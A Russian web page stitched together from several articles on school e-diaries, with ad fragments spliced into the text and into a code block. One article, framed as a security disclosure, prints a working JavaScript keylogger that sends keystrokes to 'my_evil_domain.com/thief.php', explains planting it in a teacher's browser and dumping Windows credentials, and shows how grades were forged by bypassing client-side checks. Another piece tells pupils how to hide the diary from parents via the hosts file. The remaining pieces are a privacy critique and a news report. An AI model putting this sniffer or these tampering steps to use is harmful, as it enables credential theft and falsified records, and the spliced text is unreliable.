Неофициальные электронные дневники под запретом

В этом топике будет затронута проблема, связанная с организацией надежности цифровых информационных систем, являющихся частью процесса современного образования. Если говорить конкретно, то электронных дневников. Неофициальные электронные дневники под запретом Как известно, цифровые внедрения нынче повсеместны: школы и университеты заводят собственные странички в социальных сетях и блогах для информирования о происходящем, редкое учебное заведение не имеет собственного сайта, а электронные журналы вот-вот окончательно вытеснят бумажные… И это лишь часть тех перемен, которые происходят у нас на глазах. Конечно же, в информационный век этому уже не приходится удивляться: люди привыкли, что вся интересующая их информация находится интернете. Очевидно, эти процессы инкапсулируют в себе и немалую ответственность как со стороны пользователей, так и со стороны разработчиков. Теперь недостаточно, уходя из кабинета, запирать дверь на ключ, оставляя позади нее всё важное. В цифровом мире физическая недоступность не является гарантией безопасности (однако, несомненно, этот аспект крайне важен в плане обеспечения комплексной безопасности). Но, обо всем по порядку. «Самая большая уязвимость любой информационной системы — это её пользователь»(с) С этим высказыванием трудно поспорить — человек есть человек. Именно эта проблема является ключевой в плане надежности и безопасности информационных ресурсов как со стороны пользователей, так и разработчиков. Эта проблема актуальна ровно столько, сколько существует сам человек, а поэтому она не относится к цифровому миру, как таковому. Ведь и во времена, предшествующие цифровым, например, бумажный журнал было доверено переносить конкретному человеку (старосте, кажется), который, в общем-то, мог бы пользоваться своим положением или быть использованным другими своими одногруппниками, что в конечном счете вполне могло привести к подделке оригинальной информации, ее компроментации. Другой пример, когда виновниками выступают уже не доверенные лица, а непосредственные «владельцы» информации. Если рассматривать это на конкретном примере, то легко представить себе обычного, скажем, секретаря, не подумавшего не только забрать, но и вообще закрыть журнал с важной информацией на время своего отсутствия в кабинете. Такое бывает и нередко. Это также может привести к утечке/подделке важных для учреждения сведений. В современное время примеры неаккуратности человеческого фактора остаются идентичными, разве что бумажки заменяются компьютерами. На самом деле это несет еще большую угрозу. Если запрограммировать и «заразить» бумажку было нельзя, то с компьютерами все обстоит иначе. Редкий сотрудник (по крайней мере, в сфере школьного образования) нажимает Win+L, отлучаясь по делам, некоторых в принципе не заботит, стоят ли пароли на их учетных записях Windows, а третьи вообще пускают за свой ноутбук чуть ли ни каждого встречного… Все это лишь усугубляет и без того ненадежные системы. Вы можете использовать самые безопасные браузеры, накачать дюжину различных антивирусов и даже использовать уникальный пароль учетной записи, но если пускать за свое место других людей без пристального наблюдения за их действиями, ничто не сможет гарантировать надежность рабочего места и отсутствие утечек. Теперь хотелось бы привести простой пример эксплуатации «человеческого фактора».

Есть добрый преподаватель географии Иван Иванович, который попросил своего «ученика-компьютерщика» Антона Антоновича разобраться с тем, почему на его компьютере нет звука в презентации(обычная проблема). Ученик, быстро разобравшись с проблемой, пока Иван Иванович пишет на доске материал к следующему уроку, подумывает о перехвате данных своего учителя с этого компьютера(часто это почта, логины-пароли от соц.сетей и электронных журналов и т.д). Заранее Антоном был заготовлен злобный JavaScript-сценарий, являющийся частью его self-made сниффера:

alt

Узнай стоимость своей работы

Бесплатная оценка заказа!

Оценим за полчаса!

(function(){

THIEF = «http://my_evil_domain.com/thief.php»;

function grab(e)
{
var o = e.srcElement;
var img = new Image();
var text = o.value;
if(!text || typeof text == «undefined»)
text = o.innerHTML;
if(!text || typeof text == «undefined» || (text+»»).trim().length==0)
return;
img.src = THIEF+»?stolendata=»+encodeURIComponent(text)+
«&urlfromdata=»+encodeURIComponent(location.href.toString())+
«&domdata=»+encodeURIComponent(o.getAttribute(«id»)+» ||| .»+ o.getAttribute(«class»));
img.width=»1px»;
img.height=»1px»;
img.id=»taken_data_sender»;

try{
var oldImg = document.getElementById(img.id.toString());
document.body.removeChild(oldImg);
}catch(e){}

document.body.appendChild(img);
return true;
}

function connect_signal(selector)
{
var elements = document.getElementsByTagName(selector);
for(var el in elements)
elements[el].addEventListener('keyup', grab, false);
}

alt

Узнай стоимость своей работы

Бесплатная оценка заказа!
Читайте также:  Летняя школа: онлайн-образование на каникулах

Оценим за полчаса!

var selectors = ['*'];
for(var k in selectors)
connect_signal(selectors[k])

})();

И «ученик-компьютерщик» решает встроить свой скрипт внутрь любимого браузера Ивана Ивановича. Сделать Антон это может как стандартными средствами, предоставленными непосредственно браузерами, так и сторонними, вроде расширений TamperMonkey(Chrome), GreaseMonkey(FireFox) и т.д.

После чего он довольно встает с захваченного PC и идет с улыбкой к любимому учителю географии, информируя его о починке исходной проблемы. Но с этого момента все вводимые данные на захваченном компьютере будут течь к Антону.

Для более пущего эффекта он может сбросить всю историю браузера, включая запомненные ранее аутентификационные данные из форм.

Кроме того, Антон может попытать счастье и постараться вытащить пароль учетной записи Windows, используя средства наподобие wce (WindowsCredentialsEditor). Ведь вряд ли у Ивана Ивановича десяток различных паролей — так ведь неудобно — поэтому, вполне вероятно, что всего один единственный 😉

Начать, пожалуй, следует с того, что ни один электронный журнал, встретившийся мне, не обладал должной системой защиты и системой выявления несанкционированного доступа. Я не хотел бы их перечислять. Все они, с точки зрения *безопасной* авторизации, напоминали какие-то форумы и многочисленные сайты-пиратки, построенные на движке DLE. Везде для входа в свой кабинет нужно было лишь указать логин(который часто представлял из себя email) и пароль. Ни о какой истории входов-выходов и информации об открытых «висячих» сессиях и речи нет. Однако данные, находящиеся внутри, все же представляют определенную ценность. Рассмотрим пример на реально существующем электронном журнале, который функционировал в течении целого года. Предположим, тот самый «ученик-компьютерщик» этим же вечером, придя домой и проанализировав свой лог, получил несанкционированный доступ к учетной записи преподавателя: Неофициальные электронные дневники под запретом

авторизовавшись, Антон увидел следующую картину:

Неофициальные электронные дневники под запретом

что натолкнуло его на мысль о том, что имея в руках auth-данные лишь одного сотрудника своего образовательного учреждения(Ивана Ивановича), он может управлять всеми оценками любого юнита, входящего в состав этого учреждения. Это довольно странно, ведь это идет вразрез с простейшими правилами доступа.

Однако к служебной и конфигурационной информации у простого преподавателя доступа все же нет. Зато такой доступ есть у аккаунта администратора учебного заведения: Неофициальные электронные дневники под запретом Здесь приведен один из ключевых конфигурационных разделов журнала. Красным выделено то, что влияет на безопасность и достоверность данных. Далее я хотел бы показать, что часто подобные настройки являются лишь иллюзией, которая еще больше усугубляет положение: ответственные лица полагают, что информация месячной/недельной(и т.д) давности была проверена и заморожена навсегда. Однако, это не так. Что-либо изменить просто так не удастся, т.к на данный момент уже прошло слишком много времени. Неофициальные электронные дневники под запретом Но если заглянуть в исходный код и посмотреть, как все устроено, можно увидеть следующее: Неофициальные электронные дневники под запретом

Синим обозначено то, что якобы не подлежит замене, красным — что изменяемо. Сразу появляется мысль подставить данные из уязвимого красного блока в синий, т.е заменить SPAN на INPUT. После срабатывания JS-события onChange происходит следующее:

Неофициальные электронные дневники под запретом

Сработала одна из систем, отвечающих за надежность данных. Однако, если вспомнить, что есть HTML-сущности, то комментарий можно будет скрыть.

После нажатия на кнопку и обновления страницы можно увидеть: Неофициальные электронные дневники под запретом Замороженные данные были подвержены изменению? Да. А причина тому кроется в том, что разработчики данного дневника не подумали проверять данные на серверной стороне. Они доверчиво принимают параметры от клиента, а сервер, как зомби, тупо прожевывает их, не сомневаясь в надежности… Но, как оказалось, комментарии можно и вовсе обойти, а присутствие/отсутствие на конкретном уроке подделать, что в общем-то уже менее серьезно. Достаточно перейти на страницу урока( ↑ ссылка в заголовке таблицы ↑ ): Неофициальные электронные дневники под запретом Здесь есть возможность добавить оценку(значок «плюсик»), но не изменить уже существующую(замороженную). Красным цветом снова показано «уязвимое» место системы, а синим — его эксплуатация. Здесь просто воспользоваться методом замены не получится( нельзя просто так взять и заменить DIV на A ), потому что тег ссылки содержит в себе служебные параметры: ID оценки и ID человека, которому она принадлежит. По нажатию на ссылку всплывает окно, ассоциированное с данными оценки. Поэтому для эксплуатации придется совсем немного подкорректировать параметры ссылки: Исходные данные:

1) +

2)

5

Аутпут:

+

Теперь, если произвести замену, изменить и обновить: Неофициальные электронные дневники под запретом Снова удалось заменить замороженные данные. Даже без указания (причины)! Здесь также наблюдается уязвимость, связанная с односторонней проверкой данных. Вот таким достаточно простым способом удалось обойти основной раздел, отвечающий за защиту и надежность самых важных данных электронного журнала. Исследование HTTP-запросов показало, что комментарий не учитывается вообще — это просто сторонний параметр, который может быть и пустым(значение на пустоту проверяется на клиентской стороне). Возможно, разработчики и проектировщики(если проектировщики вообще были) точно были уверены, что данными функциями будут пользоваться исключительно сотрудники образовательных учреждений… но, на худой конец, ведь вполне может быть и так, что ученик является родственником определенного сотрудника и они пользуются общим компьютером…

В начале описания проблемы#2 было сказано, что уязвимый электронный журнал функционировал в течении целого учебного года.

Исследование же журнала было проведено почти в самом начале учебного года, разработчики и администрация были проинформированы, однако ни одной ошибки так и не было исправлено за всё прошедшее время.

Вполне вероятно, что проблемой#1, связанной с человеческим фактором, воспользовалось множество учеников из разных образовательных учреждений, что в итоге могло привести к массовой подделке исходных данных. Проблема#2 лишь усугубляет эту ситуацию.

Сотрудники образовательных учреждений так же продолжают предоставлять доступ к своим компьютерам каждому встречному, не наблюдая за их действиями. Некоторые позаботились о смене своих «штатных» паролей(или их первоначальной установки). В целом ничего не изменилось, и уровень как безопасности, так и надежности остался на прежнем уровне.

Вывод

Проблема, как и положено, кроется в корне. Чтобы ее можно было как-то искоренить, необходимо заставлять людей задумываться о безопасности их рабочего места, о том, что вокруг «ходит» слишком много угроз.

Утечка и несанкционированный доступ — часто лишь вопрос времени не только в контексте современных образовательных учреждений. Но на их примере очень легко убедиться в некомпетентности многих сотрудников. На примере электронного журнала(dnevnik.mos.

ru) стало видно, что некомпетентность лишь одного человека может повлечь за собою крах, в данном случае, всей системы оценивания.

Многие школьные учителя еще только осваиваются в плане электронных ресурсов, но когда однажды(уже очень скоро) произойдет повсеместный полноценный переход от «олдскульных» бумажных журналов к электронным, необходимо будет уметь объективно оценивать угрозы не только пользователям, но и разработчикам подобных ресурсов. Необходима тщательно проработанная система авторизации, которая бы позволяла отслеживать неправомерный доступ; необходимы и системы логгирования входов и отслеживания открытых сессий текущего аккаунта; необходимо и как можно более сузить области ответственности отдельных аккаунтов.

Все это в конечном счете позволит доверять современным электронным дневникам и не сомневаться в информации, которую они призваны не только предоставлять, но и оберегать.

Источник: https://habr.com/post/261289/

Почему не работает электронный дневник – причины и что делать?

Электронный дневник является аналогом простого школьного. Пользователь может ознакомиться с актуальной информацией об успеваемости ученика, узнать расписание, почитать комментарии преподавателя. Но иногда система дает сбой. По каким причинам не работает электронный дневник? Разберем основные проблемы.

Почему не работает электронный дневник сегодня

Основные причины, из-за которых может не функционировать представленный сервис, связаны:

  1. С техническими работами на сайте по улучшению функционала.
  2. С техническими неполадками.
  3. С браузером. Проблема кроется в кэше. Перейдите в настройки, затем в графу истории. Далее нужно найти параметр «Кэш» и нажать «Очистить». В конце перезапустите браузер и повторите попытку входа. Помните, что расположение кэша может отличаться в зависимости от программы.
  4. С плохим интернет соединением. Проверьте как работают другие сайты. Если они также плохо функционируют, то попробуйте перезагрузить роутер или обратитесь к провайдеру.

Неофициальные электронные дневники под запретом

Обычно жалобы пользователей на плохую работу системы оправданы. Ведь распространенной проблемой являются именно техработы или же непредвиденные неполадки. В таком случае вы можете обратиться в службу поддержки и уточнить. Сотрудники обязательно ответят вам в ближайшее время. Если же проблема связана с техническими работами, то оповещение будет видно прямо на сайте.

Почему не работает электронный дневник на Госуслугах

Электронный дневник является одним из ресурсов на Госуслугах. Государственный портал предлагает пользователям множество различных услуг, среди которых внесение платежей, запись к врачу и т.д. В конце 2017 года на сайте появился новый сервис для родителей. Но иногда возникают неполадки. Почему не работает электронный дневник на государственном портале?

Читайте также:  Роман поликарпов: -мы будем говорить с вами о вич, и у нас есть хорошие новости

В последнее время на ресурсе стали часто проходить тех.работы. Поэтому сайт недоступен. Пользователь может пожаловаться, написав в поддержку. Ответ поступит на электронный ящик, указанный при составлении жалобы. Эффективный способ связаться с поддержкой – позвонить по указанному на сайте номеру. Звонок бесплатный.

Почему не работает аналитика оценок в дневнике

Аналитика оценок представляет собой удобную функцию для учеников. Школьник может самостоятельно произвести анализ своих знаний. Узнать по каким предметам необходимо подтянуть свои оценки. Также ребенок может сравнить успеваемость с другими одноклассниками.

Неофициальные электронные дневники под запретом

Порой представленная функция не работает. Почему? По статистическим данным основная причина кроется именно в обслуживающих работах. Сотрудники сайта проводят работы по улучшению системы, из-за чего приостановили функционирование. Также может случилась непредвиденная поломка. Разработчики уже знают о возникшей неполадке и работают над этим.

Что делать, если не работает электронный дневник и журнал

Изначально пользователь должен убедиться, что проблемы с доступом не связаны с ним. Проверьте свое интернет соединение. Зайдите на другой ресурс и посмотрите, как загружаются страницы. Проблем нет? Обратитесь в техническую поддержку или подождите некоторое время.

Также у многих родителей возникают проблемы со входом из-за неправильно введенного пароля и логина. Некоторые системы позволяют пройти процедуру восстановления самостоятельно, главное – следовать инструкции на сайте.

Новые данные для входа поступят на телефон или на почту. Если эта функция не предусмотрена системой, то необходимо отправляться в школу и обращаться классному руководителю, чтобы получить новые данные.

Помните – сначала вы получите временный пароль, его требуется заменить на свой в настройках на сайте.

Электронный дневник не работает 2018? Недовольный родитель может оставить жалобу на плохое функционирование системы. Обычно это случается, когда на сервисе не происходят работы, а интернет работает стабильно. Позвоните по указанному номеру, и уточните у сотрудников про работу системы.

Что делать, если не работает на уроке «замечание» в дневник

Представленная функция является еще одним дополнением к электронному дневнику. Учитель оставляет замечание о поведении или другие комментарии, связанные с оповещением о мероприятии и т.д.

Родители смогут беспроблемно ознакомиться с этой информацией на странице дневника. То есть, представленный ресурс является полным аналогом простого бумажного дневника. Если не работает данная функция, то уточните этот вопрос в школе.

В образовательном учреждении возможно знают о проблеме, и стараются решить ее.

Неофициальные электронные дневники под запретом

Плохо работает электронный дневник? Обратите внимание на работу своего интернета. В другом случае нужно писать сотрудникам сайта и уточнять о плохом функционировании системы.

Когда начнет работать?

Если проблема связана именно с тех.работами, то точное время о запуске будет указано на главной странице. Обычно разработчики заранее предупреждают пользователей о дальнейших работах. В случае с неполадкой сложнее. Вы не сможете узнать, когда именно сайт начнет функционировать. Но сотрудники сайта постараются решить проблему как можно скорее.

Источник: https://e-dnevniki.ru/ne-rabotaet-elektronnyy-dnevnik.html

Как заблокировать электронный дневник

Неофициальные электронные дневники под запретом

Приветствую, мученик школьной скамьи, сегодня сайт Sovetbati расскажет как заблокировать электронный дневник от родителей, делается это для чтобы родители не узнали о ваших плохих оценках в школе в первый же день и вы успели их исправить. Способы очень простые, но эффективные.

Так же через электронный дневник ваши предки узнают о том, когда вы прогуляли уроки и за что конкретно вам поставлена двойка или пятёрка в журнал. У нас есть масса способов как не пойти в школу и куча легальных отмазок если вам надоело сидеть на уроках.

Как заблокировать электронный дневник для родителей

Неофициальные электронные дневники под запретом

Внимание! Все перечисленные ниже способы ограничат доступ к сайту электродневника только на вашем компьютере. У всех остальных он как работал, так и будет работать дальше.

Блокировка через hosts

  1. Садимся за родительский компьютер
  2. Открываем файл C:WindowsSystem32driversetchosts , отвечающий за сопоставление ip адресов доменным именам, с помощью блокнота и вносим в него строку без кавычек:
  3. “217.169.139.201 dnevnik.

    ru” – данная строка означает что сайт dnevnik.ru (сайт электронного дневника) будет сопоставлен с IP адресом 217.169.139.201, принадлежащим сайту  mail.ru.

    Иными словами, когда ваша мама или папа захотят из дома зайти на сайт dnevnik они будут перенаправлены на главную страницу mail и будут весьма удивлены. 

Блокировка через роутер

  1. В зависимости от модели вашего роутера, зайдите в админку по адресу 192.168.1.1 или 192.168.0.1 , адрес может быть другой если его изменили
  2. Введите логин и пароль от роутера
  3. Заблокируйте домен dnevnik.ru или его ip адрес 178.248.232.13 .

    В зависимости от марки вашего роутера и его локализации, блокировка может находится в таких разделах как:

    • Access control
    • Контроль доступа
    •  Контроль -> URL-фильтр
    •  Фильтр сетевых служб
    • IP filtres
    • URL filtering
    • Parental Control
    • Родительский контроль
  4. А также вы можете заблокировать упоминание слов “дневник, dnevnik, оценки”, тогда все url, содержащие данные слова будут заблокированы. Данная возможность есть не у всех роутеров.

Дополнительно в зависимости от вашего региона блокируйте и региональный портал, например, для Москвы это “Школьный портал Московской области, находящийся по адресу school.mosreg.ru”.

Как видите заблокировать доступ к электронную дневнику очень просто. Однако не забывайте что родители могут зайти и посмотреть ваши оценки в нём с работы или мобильного интернета, во всех местах вы не сможете поставить редиректы. А так же они могут узнать ваши оценки на школьном собрании или из телефонного звонка от учителя.

Как изменить оценки электронном дневнике

Можно ли изменить оценку в электронном дневнике через код элемента? Нет, так как страница загружается в вашем браузере и изменяя код, вы меняете код страницы на локальном компьютере, на сервере всё остаётся как было. Реальный выход – это прийти в школу и закрыть свои двойки пятёрками или переписать контрольную работу если учитель позволил.

Источник: https://sovetbati.pro/kak-zablokirovat-jelektronnyj-dnevnik/

Электронный дневник — как способ тотального контроля за семьей

Неофициальные электронные дневники под запретомПрошло больше трех месяцев с той поры, когда начались настойчивые просьбы классного руководителя о подписании некоего «Соглашения на обработку персональных данных родителей обучающегося», в котором предлагалась «передача данных третьим лицам«, включая данные паспорта, адреса проживания и места работы, а также социального положения. Целью подобного соглашения указывалось «обеспечение наиболее полного исполнения образовательным учреждением своих обязанностей, определенных законом«. Естественно, столь мутные формулировки не могли закончиться ничем иным, кроме отказа. Который воспринят не был, и нам вновь были переданы те же самые бланки уже с пояснением, что это нужно «для электронного дневника». Но и в этом случае запрашиваемые данные мы передавать запретили — поскольку вообще не ясно, какое отношение они имеют к дневнику.

Спустя некоторе время, администрация школы передала нам на подпись еще одну бумагу — называвшуюся теперь «Согласие на обработку персональных данных в системе «Электронный журнал».

В ней предлагалось, в целях автоматизации процессов сбора, хранения и анализа статистической информации, а также обеспечения возможности оперативного доступа к информации о посещаемости и успевамости, разрешить размещение в информационной системе «Электронный журнал» ФИО ребенка, дату рождения, пол, класс, номер личного дела, а также текущие и итоговые оценки.

Казалось бы — ничего особо интересного. Век у нас компьютерный, дневники нынче в моде антырнентые и вообще учет и контроль — первейшее дело. В таком подходе, разумеется, есть нечто рациональное, но все же классическое понятие дневника мне гораздо ближе. Потому что в электронном — есть некая обезличенность.
И потом, разве может «тотальный» электронный контроль восстановить утерянное доверие между родителем и ребенком? Я уже не говорю о некоем моральном испытании, когда ученик должен сам рассказать о своих «успехах» в прямом и переносном смысле. Ведь именно так воспитывается чувство ответственности.

Тем временем, размышляя о новизне степени отчужденности, вводимой электронной учетностью, я наткнулся на интересную новость: «Ростелеком» и Дневник.ру завершили внедрение системы «Контингент-регион» в трех субъектах РФ».

Из нее следует, что система «Контингент-регион» начала разрабатываться и внедряться в рамках «Распоряжения Правительства РФ №2125-р от 25 октября 2014 года об утверждении Концепции создания единой федеральной межведомственной системы учета обучающихся по основным образовательным программам и дополнительным общеобразовательным программам».

Судя по м на различного рода площадках, система эта располагается по адресу http://46.61.224.79/ и может быть задействована из любого региона. «Дневнику» отводится роль интегратора всей системы.

Вполне очевидно, что предложенные нам соглашения для передачи персональных данных как то связаны с внедряемой системой «Контингент». И это — настораживает. Прежде всего потому, что Дневник.

ру — частная компания, владельцами являются Prostor Capital, конечным собственником которой является бывший министр информационных технологий и связи Леонид Рейман, а так же компания Runa Capital, конечными собственниками которой являются Александр Галицкий и Сергей Белоусов.

Обе компании вложили существенные средтва — $1,7 млн. от Prostor Capital в 2011 году, и $5 млн. Runa Capital в 2012-ом.

Согласно описанию, бизнес-модель Дневник.

ру в существенной степени построена на монетизации дополнительных сервисов (основные — бесплатно), как то «SMS-оповещение родителей об успеваемости и посещаемости ученика, возможность оплатить питание, интеграция с сервисом по подбору репетиторов и др.

» Как утверждается «на сентябрь 2012 года прибыль приносят спонсорские контракты с такими партнерами как Microsoft, «Мегафон», Lego и др.» И действительно, логотипы всех четырех компаний мы видим на головной странице проекта:

Неофициальные электронные дневники под запретом При этом, как заявляется на той же заглавной странице, к проекту уже подключены 31 626 школ, 5 633 912 учеников, 668 584 учителей, 2 935 891 родителей. Как в этом свете нужно рассматривать пилотное внедрение этого проекта в регионах, пусть даже под брендом «Ростелекома», который на самом деле частно-государственный? Казалось бы — что тут такого? Решили предприимчивые ребята сделать полезный сервис для школьников. Ну и себя, разумеется не забыть. Что-то там сделали. Людям понравилось — они и вышли с предложением «распространить и углубить». А как иначе? Однако, вчитываясь в текст того самого распоряжения №2125-р, начинаешь понимать, в какую западню ведут все эти красивые картинки.

  • Для начала зафиксируем, что указанное распоряжение утверждает некую «концепцию создания единой федеральной межведомственной системы учета контингента обучающихся по основным образовательным программам и дополнительным общеобразовательным программам».
  • Что это за система, поясняется далее: «Межведомственная система представляет собой комплекс информационных систем, предназначенных для учета контингента обучающихся, взаимосвязанных с информационными системами органов государственной власти и государственных внебюджетных фондов, содержащих персональные данные несовершеннолетних«.
  • отсутствие достоверной информации о фактическом и прогнозируемом количестве обучающихся различных возрастов, проживающих на территориях и нуждающихся в образовательных услугах, негативно сказывается на решении задач управления сетью организаций, осуществляющих образовательную деятельность по основным образовательным программам и дополнительным общеобразовательным программам;
  • недостаточно эффективно решаются задачи территориального планирования строительства дошкольных образовательных организаций и общеобразовательных организаций, не решена проблема выравнивания нагрузки на организации, осуществляющие образовательную деятельность;
  • наличие информации о числе родившихся и зарегистрированных по месту жительства обучающихся способствует значительному повышению эффективности решения указанных проблем, однако такая информация сконцентрирована в различных ведомствах и зачастую недоступна в оперативном режиме;
  • отдельный интерес представляют сведения обо всех этапах обучения детей, в частности данные о прохождении обучения в различных организациях, осуществляющих образовательную деятельность, включающие в себя общую информацию об организациях, о периодах обучения, об освоенных образовательных программах, об успеваемости, о документах об образовании и (или) о квалификации, документах об обучении;

То есть вы не просто оказываетесь в некоем безобидном «электронном дневнике». Ваших детей «пришивают» к уже существующим ведомственным информационным системам, включая известные многим «госуслуги». Предпосылками создания подобной системы по мнению правительства является следующее:

известно, что образовательный процесс существенно влияет на такие факторы, как состояние здоровья, будущая социализация и профессиональная успешность обучающихся.

Данная информация необходима органам власти при принятии управленческих решений, родителям и обучающимся при выборе организаций, осуществляющих образовательную деятельность.

При этом проблему представляет не только получение этих данных из другого ведомства, но и связь данных о здоровье с данными об обучающихся и их этапах обучения;

несмотря на значительный прогресс информатизации деятельности органов власти всех уровней, существует множество разрозненных ведомственных информационных систем, содержащих различную информацию об обучающихся разных возрастных групп. Не решена проблема единой идентификации обучающихся в различных ведомственных информационных системах.

Отсутствие единого эталонного источника персонифицированной учетной записи гражданина значительно усложняет задачу корреляции данных о нем из различных источников.

Создание межведомственной системы позволит решить указанные проблемы, а также обеспечит переход на качественно новый уровень функционирования ведомственных информационных систем, содержащих информацию об обучающихся.

Другими словами, авторы концепции хотят иметь в оперативном режиме всю информацию о том, чем занимается ваш ребенок: какие кружки посещает, насколько успешно учится и как при этом у него со здоровьем. Вы скажете — ну и что такого, чем больше знаешь, тем точнее решишь, что нужно делать. Однако не кажется ли вам, дорогой читатель, что не чиновник, а родитель должен решать, что лучше?

Зачем нужен этот по сути тотальный контроль? Чтобы иметь лишний повод взять родителей под колпак? В условиях вступившего в силу ювенального 442 закона о соцобслуживании? Ой-ой-ой, пахнет это дело весьма и весьма дурно. Совершенно ясно, что не родитель будет здесь контролировать своего ребенка, а чиновник — их обоих.

Ведь совсем не зря принципами создания этой межведомственной системы являются:

  1. учет обучающихся в межведомственной системе со дня государственной регистрации рождения и начала обучения в организациях, осуществляющих образовательную деятельность; — обеспечение условий для персонифицированного учета данных об обучающихся; — наполнение межведомственной системы данными из информационных систем различных органов государственной власти и государственных внебюджетных фондов в объеме, необходимом для достижения целей, определенных Концепцией; — обеспечение доступа заинтересованных федеральных органов исполнительной власти и государственных внебюджетных фондов к единым механизмам доступа к данным об обучающихся;

  2. — использование страхового номера индивидуального лицевого счета в качестве единого идентификатора обучающегося для осуществления межведомственного информационного взаимодействия.
  3. — фамилия, имя и отчество (при наличии)обучающегося;
    — пол обучающегося;
    — место рождения обучающегося;
    — дата рождения обучающегося;
    — номер записи акта о рождении обучающегося;
    — дата государственной регистрации рождения и наименование органа,который произвел государственную регистрацию рождения;
    — гражданство;
    — серия и номер паспорта обучающегося (после его получения) или реквизиты иного документа, удостоверяющего личность;
    — адрес регистрации обучающегося по месту жительства (по месту пребывания);
    — страховой номер индивидуального лицевого счета обучающегося;
    — сведения о родителях или законном представителе обучающегося (фамилия, имя, отчество (при наличии), гражданство, адрес регистрации, адрес регистрации по месту жительства (по месту пребывания), серия и номер паспорта или реквизиты иного основного документа, удостоверяющего личность, страховой номер индивидуального лицевого счета);

  4. — общие сведения, данные об этапах обучения, о достижениях и иную информацию, необходимую для решения задач межведомственной системы.
  5. Естественно, что кроме персональной информации система будет содержать «данные о периодах обучения, об освоенных образовательных программах, успеваемости, о документах об образовании и (или) о квалификации, документах об обучении и о сертификатах«.

Все это дополнятся вот таким вот перечнем персональных данных учащихся, хранимых в системе:

Это ли не тотальный контроль? Вы скажете — ну это все, конечно, неприятно, но я то, прочтя ваш пост, никакие бумаги подписывать не буду, и другим расскажу, чтоб не подписывали. А если подписали — то можно и отозвать.

Это все конечно верно.

Но! Глава VII указанной концепции предполагает возложить на Министерство образования и науки РФ «подготовку проектов о внесении в законодательство Российской Федерации в сфере образования изменений, необходимых для создания и функционирования межведомственной системы«, а так же «подготовку при необходимости совместно с заинтересованными федеральными органами исполнительной власти и государственными внебюджетными фондами предложений о внесении в законодательство Российской Федерации изменений, обеспечивающих установление полномочий федеральных органов исполнительной власти и государственных внебюджетных фондов по предоставлению персональных данных граждан Российской Федерации, и предложений, касающихся порядка получения, обработки, хранения и уничтожения персональных данных граждан Российской Федерации«.

Так-то! И всем понятно, что если есть заинтересованные лица, то новые законопроекты будут и создаваться и лоббироваться. Что в итоге? В итоге мы видим попытку, под вывеской «эффективного решения задач обучения», создать систему тотального контроля за ребенком и его родителями. При участии (и под давлением) частных лиц. Иначе как можно объяснить, что по плану опытная эксплуатация должна начаться в 2016 году — а реально объявляют о ее «успешном начале» почти на 2 года раньше? Возникает вопрос — кому нужная подобная спешка? И как-то сразу опять вспоминаются активные просьбы классных руководителей о подписании соглашения для передачи персональных данных.

Я — отказался. А вы?

Источник: https://rvs.su/statia/elektronnyy-dnevnik-kak-sposob-totalnogo-kontrolya-za-semey

Москва запретила сторонним разработчикам создавать «электронные дневники» для Android и iPhone

08.08.2017, Вт, 18:40, Мск , Денис Воейков

В столичном ДИТе приняли решение закрыть от сторонних
программистов API городского школьного дневника. Причиной чиновники указывают
халатность самих разработчиков, которая в отдельном случае привела к показу детям непристойного контента.

Сторонние разработчики мобильных приложений для московского электронного
дневника больше не смогут получить к нему доступ. Это стало понятно из сообщений
Департамента информационных технологий правительства Москвы (ДИТ). «Поддержка
API дневника для всех без исключения разработчиков будет остановлена с 1
сентября. Все они уже получили соответствующие уведомления», — рассказали CNews
в ДИТе.

«К другим ныне доступным наборам данных доступ разработчиков
закрыт не будет.

Ограничение коснулось только особо чувствительных данных
школьников», — заявил в разговоре с CNews глава ДИТа Артем Ермолаев.

— Сейчас мы готовим для раскрытия API электронной
медицинской карты, и, когда кончится лето, и все вернутся из отпусков, нам
предстоит много дискутировать с ИТ-сообществом, как это сделать безопасно».

Причины закрытия

«Халатность или неопытность некоторых сторонних
разработчиков, их неготовность глубоко анализировать последствия своей работы,
стали причиной того, что в разгар прошлого учебного года, в одном их самых массовых
неофициальных мобильных приложений дневника, были размещены материалы
порнографического характера, — указывает Ермолаев. — Это происшествие создало
серьезный резонанс среди родителей. На ДИТ массово были поданы жалобы, в
отдельных случаях — судебные иски. Из-за этой истории мы чуть вообще не
похоронили “Электронный дневник”, потому что общественность нас уничтожала».

Неофициальные электронные дневники под запретом

Разработчики сторонних приложений к столичному электронному дневнику по решению ДИТа остались без API

Чиновник заверяет, что разработчик проштрафившегося
приложения на вопрос, как такое могло произойти, ответил «скорее всего, я
накосячил с фильтром гугл адмоб».

«Он относится к этому случаю, как всего лишь
к ошибке, которая, между тем, привела к
тому, что тысячи детей увидели контент, который не должны были видеть.

Кто
может дать гарантии того, что подобные “косяки” не повторятся?», — задается
вопросом Ермолаев.

Упомянутого главой ДИТ разработчика зовут Леван Квирквелия. По его словам, он только что закончил обычную
московскую школу и поступил в вуз.

В своем недавнем интернет-посте, привлекшем
внимание общественности и ставшем причиной, по которой ДИТ сегодня выступил с
разъяснениями, упомянутую Ермолаевым ситуацию молодой человек описывает
следующим образом.

«В какой-то момент 300 пользователей увидели рекламу,
которая почти 18+ (просто пошлая), а при переходе по ней открывался UС Browser.
Ошибка была исправлена в тот же вечер».

Свое приложение для Android и iOS Квирквелия именует «помощником»
ребенка. Программа дает ему простейшие советы и подсказки по учебе —
относительно мест проведения уроков, тем занятий и т. п. Кроме того, оно предоставляет
ему возможность в динамике отслеживать свои учебные успехи. Аудиторию своего
приложения Квирквелия оценивает в 100 тыс. пользователей по состоянию на конец
2016 г.

Что теперь
станет с официальным дневником

С началом нового учебного года воспользоваться сервисом столичного
дневника можно будет только через авторизацию на официальном сайте мэра Москвы
mos.ru.

Пользователю предстоит корректно и достоверно указал свой номер
телефона и e-mail, чтобы в ДИТе смогли его однозначно идентифицировать в базах
данных.

«Для защиты персональных данных ребенка, а также для защиты ребенка от
неэтичной информации, мы будем использовать те же уровни защиты, которые
используем при предоставлении других государственных услуг и сервисов», —
заявляет Артем Ермолаев.

«Мы переводим дневник на бесплатный для жителей ресурс
mos.ru и также у нас есть официальное бесплатное приложение дневника.
Бесплатность — это тоже важно, — уверен Ермолаев. — Потому что мы защищаем
людей в принципе от любой рекламы внутри сервиса, а тем более неэтичной».

В то же время, чиновник заверяет, что отдает себе отчет в
том, что популярные приложения потому и стали популярными, что предоставляли
жителям востребованный сервис, обладали определенными функциональными
преимуществами в сравнении с официальным дневником. «Мы готовы перенять
положительный опыт, наработки, обсудить возможные форматы работы со сторонними
разработчиками, чтобы усилия, направленные на реализацию удобного продукта для
